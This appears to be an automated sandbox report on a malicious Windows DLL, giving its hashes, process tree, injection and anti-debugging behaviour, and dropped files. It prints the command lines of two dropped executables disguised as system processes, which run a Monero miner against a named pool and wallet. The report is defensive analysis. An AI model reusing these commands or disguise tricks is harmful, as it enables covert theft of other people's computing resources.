Analysis

max time kernel: 169s
max time network: 200s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-11-2022 00:04
Static task: static1

Behavioral task: behavioral1
  Sample: f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll
  Resource: win7-20221111-en

Behavioral task: behavioral2
  Sample: f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll
  Resource: win10v2004-20221111-en
General

Target: f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll
Size: 4.6MB
MD5: 3e1ed972a8d8bdc771949e28d68cd3f3
SHA1: 2cdf048397f297b21d146864800c911e42bdf223
SHA256: f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70
SHA512: d68a053aa2325182b7582b409039d6edfbcf48ff6027acde62c33441e587e409aa015d55df27d57947a68ff946152ac6dcd972facf25fefba95e6b00d0c4df84
SSDEEP: 98304:Bvrr7GMY+Ukb8fljBEB/X+eMC/Q56aYMsrHRc/2nBmmk1FXUessPF:tr/meBPRMC/nalsT+/WmBFXO0
Malware Config
Signatures
Executes dropped EXE (2 IoCs)
  Processes:
    pid   process
    1792  dwm.exe
    3612  cidaemon.exe

Resources matched by YARA rule (yara_rule: vmprotect), 8 entries:
    resource                                                                        yara_rule
    C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe                            vmprotect
    C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe                       vmprotect
    C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe                            vmprotect
    behavioral2/memory/1792-138-0x00007FF70C380000-0x00007FF70C72D000-memory.dmp   vmprotect
    C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe                       vmprotect
    behavioral2/memory/3612-142-0x00007FF709480000-0x00007FF70984F000-memory.dmp   vmprotect
    behavioral2/memory/1792-143-0x00007FF70C380000-0x00007FF70C72D000-memory.dmp   vmprotect
    behavioral2/memory/1792-144-0x00007FF70C380000-0x00007FF70C72D000-memory.dmp   vmprotect

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  Processes:
    pid   process
    1792  dwm.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes:
    pid   process
    1464  rundll32.exe  (same entry listed 64 times)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description                        pid   process
    Token: SeLockMemoryPrivilege       1792  dwm.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
    pid   process
    1464  rundll32.exe
    1464  rundll32.exe

Suspicious use of WriteProcessMemory (7 IoCs)
  Processes:
    description                         pid   process        target process
    PID 640 wrote to memory of 1464     640   rundll32.exe   rundll32.exe
    PID 640 wrote to memory of 1464     640   rundll32.exe   rundll32.exe
    PID 640 wrote to memory of 1464     640   rundll32.exe   rundll32.exe
    PID 1464 wrote to memory of 1792    1464  rundll32.exe   dwm.exe
    PID 1464 wrote to memory of 1792    1464  rundll32.exe   dwm.exe
    PID 1464 wrote to memory of 3612    1464  rundll32.exe   cidaemon.exe
    PID 1464 wrote to memory of 3612    1464  rundll32.exe   cidaemon.exe
Processes (tree; each entry is indented under its parent)

C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll,#1
  PID: 640
  Signatures:
    - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\f2f91e4c73d90077922c861830c41d13521fe207bbca5966471ec28cc036cf70.dll,#1
    PID: 1464
    Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.2
      PID: 1792
      Signatures:
        - Executes dropped EXE
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe -o stratum+tcp://xmr-usa.dwarfpool.com:8080 -dbg -1 -p x -u 48mqxx742xV9MJHqHy7XQVJYKT6j1SmJBJTeJSRD2zfve1NdSg9io4yWUCsc7JJH8bgDg9opBicsJZtLTAGzswRiGZGUJ6v.3
      PID: 3612
      Signatures:
        - Executes dropped EXE
Network
MITRE ATT&CK Matrix
Downloads

C:\Users\Admin\AppData\Local\Temp\msupdate71\cidaemon.exe
  Filesize: 1.6MB
  MD5: 69e6e75f2219d64f3c776d2ef313b9ff
  SHA1: 211042ac764db953ca0c54117aff8e241d86e4fe
  SHA256: 09bb784499c13f9a43548d0e660ba4e5f009f06f5d5da5d57d11a1b4aceb1f8a
  SHA512: fa77b1bcc58d150df3e68fc64373302f71e2abcc058e0f6a1e29cfa44336146d8aa299c54bbc77e2ff877f0179a4429dcf01b841ede0379a8c7236fbab820410

C:\Users\Admin\AppData\Local\Temp\msupdate71\dwm.exe
  Filesize: 1.5MB
  MD5: eedb9d86ae8abc65fa7ac7c6323d4e8f
  SHA1: ce1fbf382e89146ea5a22ae551b68198c45f40e4
  SHA256: d0326f0ddce4c00f93682e3a6f55a3125f6387e959e9ed6c5e5584e78e737078
  SHA512: 9de3390197a02965feed6acdc77a292c0ef160e466fbfc9500fa7de17b0225a935127da71029cb8006bc7a5f4b5457319362b7a7caf4c0bf92174d139ed52ab5

Memory dumps:
  memory/1464-132-0x0000000000000000-mapping.dmp
  memory/1792-133-0x0000000000000000-mapping.dmp
  memory/1792-138-0x00007FF70C380000-0x00007FF70C72D000-memory.dmp  (Filesize: 3.7MB)
  memory/1792-143-0x00007FF70C380000-0x00007FF70C72D000-memory.dmp  (Filesize: 3.7MB)
  memory/1792-144-0x00007FF70C380000-0x00007FF70C72D000-memory.dmp  (Filesize: 3.7MB)
  memory/3612-135-0x0000000000000000-mapping.dmp
  memory/3612-142-0x00007FF709480000-0x00007FF70984F000-memory.dmp  (Filesize: 3.8MB)